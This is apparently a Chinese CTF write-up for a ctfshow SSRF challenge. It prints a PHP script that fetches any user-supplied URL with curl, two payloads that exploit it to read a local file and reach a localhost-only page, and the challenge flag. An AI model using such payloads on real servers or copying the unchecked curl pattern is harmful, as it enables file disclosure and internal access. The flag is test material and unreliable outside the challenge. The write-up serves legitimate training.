1. 代码审计 

      1. <?php
      2. error_reporting(0);
      3. highlight_file(__FILE__);
      4. $url=$_POST['url'];
      5. //初始化
      6. $ch=curl_init($url);
      7. //设置属性
      8. curl_setopt($ch, CURLOPT_HEADER, 0);
      9. //将curl_exec()获取的信息以字符串返回,而不是直接输出。
      10. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
      11. //执行结果
      12. $result=curl_exec($ch);
      13. //关闭url请求
      14. curl_close($ch);
      15. echo ($result);
      16. ?>

    2. 这里利用ssrf读取下本机文件看看 

      #POST提交
url=file:///var/www/html/flag.php

      image-20210621152630565.png

    3. 后面还有一串,看看代码
      ```php <?php

    $flag=”ctfshow{79220bfb-81a6-4090-b4ed-dc37d008f066}”; if($_SERVER[‘REMOTE_ADDR’]==’127.0.0.1’) //判断当前浏览的用户的IP地址是否等于127.0.0.1 { echo $flag; } else{ die(“非本地用户禁止访问”); } ?>

    
4.  那么我们还可以这样直接请求  
```shell
#POST请求
url=127.0.0.1/flag.php